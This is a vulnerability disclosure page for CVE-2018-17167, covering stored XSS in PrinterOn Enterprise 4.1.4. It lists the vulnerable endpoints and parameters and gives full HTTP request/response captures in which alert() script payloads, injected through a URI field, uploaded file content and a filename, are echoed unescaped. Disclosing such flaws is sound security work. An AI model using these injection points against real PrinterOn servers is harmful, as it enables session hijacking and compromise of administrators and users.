Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2018-17167-XSS-PrinterON/
Disclosures/CVE-2018-17167-XSS-PrinterON/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

CVE-2018-17167-XSS-PrinterON

PrinterOn Enterprise 4.1.4 suffers from multiple authenticated stored XSS vulnerabilities via the (1) "Machine Host Name" or "Server Serial Number" field in the clustering configuration, (2) "name" field in the Edit Group configuration, (3) "Rule Name" field in the Access Control configuration, (4) "Service Name" in the Service Configuration, or (5) First Name or Last Name field in the Edit Account configuration.

Application Vulnerable Page URL Vulnerable Parameters Type
PrinterOn Admin v4.1.4 /clustering/processing/d34b4b74-d9a4-4d41-a6e5-e9e57aa1b39d/edit serverAddress, serverSerialNumber Stored
PrinterOn Admin v4.1.4 /users/groups/edit name Stored
PrinterOn Admin v4.1.4 /users/accessControl/rule/add name Stored
PrinterOn Admin v4.1.4 /cps/36dfadca-d73a-409a-bcd3-174c8bc75ec5/basic/ serviceName Stored
PrinterOn CPS v4.1.4 /cps/user/ firstName, lastName Stored
PrinterOn CPS v4.1.4 /cps/servlet/StoreOptions documentURI_uri, documentURI_file(both filename and content) Self, Stored

(1) /clustering/processing/d34b4b74-d9a4-4d41-a6e5-e9e57aa1b39d/edit - serverAddress, serverSerialNumber

(2) /users/groups/edit - name

(3) /users/accessControl/rule/add - name

(4) /cps/36dfadca-d73a-409a-bcd3-174c8bc75ec5/basic/ - serviceName

(5) /cps/user/ - firstName, lastName

(6) /cps/servlet/StoreOptions

- documentURI_uri:

Request:
POST /cps/servlet/StoreOptions HTTP/1.1
Host: 172.17.20.183
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.20.183/cps/SelectOptions?jobId=561829783
Content-Type: multipart/form-data; boundary=---------------------------95469740417489422911864408348
Content-Length: 3499
Cookie: JSESSIONID=82C1F316328E1701A81C3D508BE22BD0; locale=en_US
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="redirectUrl"

SelectOptions2
-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="jobId"

561829783
-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="documentURI_file"; filename=""
Content-Type: application/octet-stream


-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="documentURI_uri"

<script>alert("PrinterOn 4.1.4 XSS")</script>
-----------------------------95469740417489422911864408348
Content-Disposition: form-data; name="poCopies"
<--SNIP-->
Response:
HTTP/1.1 200 
Cache-Control: must-revalidate
Cache-Control: max-age=0
Cache-Control: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 6836
Date: Thu, 06 Sep 2018 06:18:26 GMT
Connection: close
Server: PrinterOn
<--SNIP-->
                <div class="col-md-3 text-center">
                    <script>alert("PrinterOn 4.1.4 XSS")</script>
                </div>
            </div>

            <div class="row">
                <div class="col-md-3"></div>
                <div class="col-md-3 text-center">
                    <label class="control-label">Job ID</label>
                </div>
                <div class="col-md-3 text-center">
                    1001236
                </div>
            </div>
        </div>
    </div>

	
</div>
    </body>
</html>

- documentURI_file (content)

Request:
POST /cps/servlet/StoreOptions HTTP/1.1
Host: 172.17.20.183
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.20.183/cps/SelectOptions?jobId=561829786
Content-Type: multipart/form-data; boundary=---------------------------8402911309205592381366920078
Content-Length: 3450
Cookie: JSESSIONID=0C0E333C8523D4EBBBB932B109C06387; locale=en_US
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="redirectUrl"

SelectOptions2
-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="jobId"

561829786
-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="documentURI_file"; 
Content-Type: text/plain

<script>alert("PrinterON 4.1.4 XSS2")</script>
-----------------------------8402911309205592381366920078
Content-Disposition: form-data; name="documentURI_uri"
<--SNIP-->
Response:
HTTP/1.1 200 
<--SNIP-->
Content-Length: 6837
Date: Thu, 06 Sep 2018 06:47:14 GMT
Connection: close
Server: PrinterOn

<--SNIP-->

 <div class="row">
                <div class="col-md-3"></div>
                <div class="col-md-3 text-center">
                    <label>Document</label>
                </div>
                <div class="col-md-3 text-center">
                    <script>alert("PrinterON 4.1.4 XSS2")</script>
                </div>
            </div>

            <div class="row">
                <div class="col-md-3"></div>
                <div class="col-md-3 text-center">
                    <label class="control-label">Job ID</label>
                </div>
                <div class="col-md-3 text-center">
                    1001248
                </div>
            </div>
        </div>
    </div>

	
</div>
    </body>
</html>

- documentURI_file (filename):

Request:
POST /cps/servlet/StoreOptions HTTP/1.1
Host: 172.17.20.183
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.20.183/cps/SelectOptions?jobId=561829788
Content-Type: multipart/form-data; boundary=---------------------------48421886014508415371764384321
Content-Length: 3516
Cookie: JSESSIONID=E5B484FB7164D912126E0705CF62604F; locale=en_US
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="redirectUrl"

SelectOptions2
-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="jobId"

561829788
-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="documentURI_file"; filename="<script>alert("PrinterOn 4.1.4 XSS3")</script>"
Content-Type: text/plain

TEST PAGE TEST PAGE TEST PAGE

-----------------------------48421886014508415371764384321
Content-Disposition: form-data; name="documentURI_uri" 
<--SNIP-->
Response:
HTTP/1.1 200 
Cache-Control: must-revalidate
Cache-Control: max-age=0
Cache-Control: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Date: Thu, 06 Sep 2018 07:26:37 GMT
Connection: close
Server: PrinterOn
Content-Length: 9537
<--SNIP-->
 <div class="row">
                              <div class="col-md-3"></div>
                              <div class="col-md-3 text-center">
                                  <label>Document</label>
                              </div>
                              <div class="col-md-3 text-center">
                                  <script>alert("PrinterOn 4.1.4 XSS3")</script>
                              </div>
                          </div>
                          <div class="row">
                              <div class="col-md-3"></div>
                              <div class="col-md-3 text-center">
                                  <label class="control-label">Job ID</label>
                              </div>
                              <div class="col-md-3 text-center">
                                  1001256
                              </div>
                          </div>
                          <!-- Closing this will cancel your request -->
                          <div class="row">
                              <div class="col-md-3 text-center">      
                          </div>
                      </div>
                    </div>
                </div>
    </div>
</div><script type="application/javascript" src="/cps/js/SubmitRequest.js"></script>
    </body>
</html>